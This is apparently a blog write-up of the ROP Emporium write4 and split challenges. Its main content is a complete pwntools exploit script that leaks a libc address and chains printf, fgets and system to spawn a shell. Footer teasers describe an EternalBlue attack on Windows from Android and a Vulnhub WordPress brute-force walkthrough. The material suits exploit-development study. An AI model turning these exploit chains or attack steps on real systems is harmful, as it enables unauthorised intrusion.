[ROPEmporium]: Bypassing ASLR and NX

-
Hi, in this tutorial i'll share how i did the write4 and split from ropemporium, bypassing NX (non executable stack) and ASLR (Address Space Layout Randomization). This script works fine to both examples.

from pwn import *

#context.log_level = "debug" #Enable it to use the pwntools on debug mode

e = ELF("./write432") #Open binary.
p = process(e.path) #Create new process.
p.sendline(cyclic(400)) #send 400 pattern to know where is the overflow.
p.wait()
core = p.corefile #create one core file with eip overflow.

eip_offset = cyclic_find(core.eip) #find correct eip offset

print ""
info("Found eip Offset %d", eip_offset)
print ""

p = process(e.path)
p.recv()

#Searching symbols on the binary

printf = e.symbols["printf"]
main = e.symbols["main"]
stdin = e.symbols["stdin"]
fgets = e.symbols["fgets"]
buffer_mem = 0x0804a028

#buffer_mem is address of .data on binary, you can get it doing:
#readelf -a write432 | grep .data
#readelf -a split32 | grep .data

#creating 1st ROP CHAIN

rop = ROP(e)
rop.call(printf, (stdin,))
rop.call(main , (0,0,0,))
payload = cyclic(eip_offset) + rop.chain()

#eip_offset = 44 (in this case)
#Basically you will "printf" -> "stdin" address and back to main()

print ""
success("ROP CHAIN: " + " ".join([str(hex(x)) for x in unpack_many(rop.chain())]))
print ""

#sending 1st payload to "printf" our "stdin"

p.sendline(payload)
info("Sending payload 1..")

data = p.recv()
leak = unpack(data[0:4]) #receiving the stdin leaked address

success("Found STDIN leak: %#x", leak)


#Creating 2nd ROP CHAIN

rop = ROP(e)
rop.call(fgets, (buffer_mem, 0x15, leak,))
rop.call(main, (0,0,0,))
payload = cyclic(eip_offset) + rop.chain()

#Now we will use "fgets" like "stdin" to input our command, then execute after that with rop.system(buffer_mem)

print ""
success("ROP CHAIN: " + " ".join([str(hex(x)) for x in unpack_many(rop.chain())]))
print ""

#Sending 2nd payload to send rop chain and our command to execute it, in this case "/bin/sh"
p.sendline(payload)
p.sendline("/bin/sh")
info("Sending payload 2...")


#Creating 3th ROP CHAIN

rop  = ROP(e)
rop.system(buffer_mem)  #Executing command
payload = cyclic(eip_offset) + rop.chain()

print ""
success("ROP CHAIN: " + " ".join([str(hex(x)) for x in unpack_many(rop.chain())]))
print ""


#Sending 3th payload with our command executed by fgets.
p.sendline(payload)
info("Sending payload 3...")
p.interactive()


Comentários

Postar um comentário

Postagens mais visitadas deste blog

[Tutorial]: MS17-010 in Android world

-
Imagem
MS17-010 in Android world In this tutorial, i’ll show you guys, how to use the exploit called “Eternalblue” to attack win 7 → win 10, using a android. First of all, I would recommend to you learn about what is Eternalblue , and HOW this exploit works, aaand i’m not responsible for your actions. Be careful. In this tutorial I used: Asus zc553kl with Android 7.0 (nougat). [192.168.1.7]    Windows 7 Ultimate 64bit (Virtualbox) [192.168.1.10]. Termux app ( https://termux.com/ ) Kali Linux (x86) Hacker keyboard app (Android) STARTING First of all you need to download the termux app( on playstore ) and install it. You can learn a lot on this blog how to use termux app. Link: https://gauravssnl.wordpress.com/2017/01/15/how-to-use-termux-app-for-android-terminal-emulator-and-linux-environment/ After termux updated, you must to install our friend metasploit-framework . Use this script to install it. https://github.com/verluchie/termux-metasploit
Leia mais

[Vulnhub]: Vulnerable docker

-
Vulnerable docker  VM LINK:  https://www.vulnhub.com/entry/vulnerable-docker-1,208/ Hello world, it is my first write up on this blog. First of all, i’m don't speak fluently, and my English is not quite good, maybe I can say wrong words or something. Anyway, lets go to the write up At beginning, I like to do nmap root@kali : #  nmap -sC -sV -A 192.168.1.6 You can notice the ports 22, and 8000 are open, have a look what is inside of 8000 HTTP port. A wordpress website.. with a big text, right? Ooh looks familiar like another ctf challenges, when you have some random text, one website and one wp-login page(in this case). We need to use this pattern: cewl + john + wpscan cewl → create a wordlist based in the website words. john → create rules on that cewl wordlist. wpscan → bruteforce the xmlrpc.php in the wordpress website. You can follow these commands: root@kali: #  cewl 192.168.1.6:8000 -w cewl_wordlists root@kali : #  john --wordlist:cewl_wordlist --r
Leia mais

[Simple 90's BOF Tricks] Stack buffer overflows advanced | chapter.1

-
Imagem
Hello people around the world! Sorry for the long time to do a new blog post, i had so much work , ctf's , certificates , most people never seen this blog... that's make me really sad too.. whatever .. i'll try to start this tutorial series with objective to share my little knowledge about Stack buffer overflows and related . I have plans to post most of my knowledge acquired during my OSCE , CTF's , self studing and so on . The ideia behind this tutorials series are to explain the most detailed , possible and RESUMED exploitation techniques which are normally used on real world. Those techniques are all outdated ( yes, it is!! most of them )  once all of this stack stuffs are not exploitable anymore on big applications, such as: browsers , kernel drivers , etc . Most of the modern exploits are written to explore the dynamic memory called heap . Those  heap exploits have your own classifications like stack overflows, such as: Use-After-Free , Double-Free , Heap
Leia mais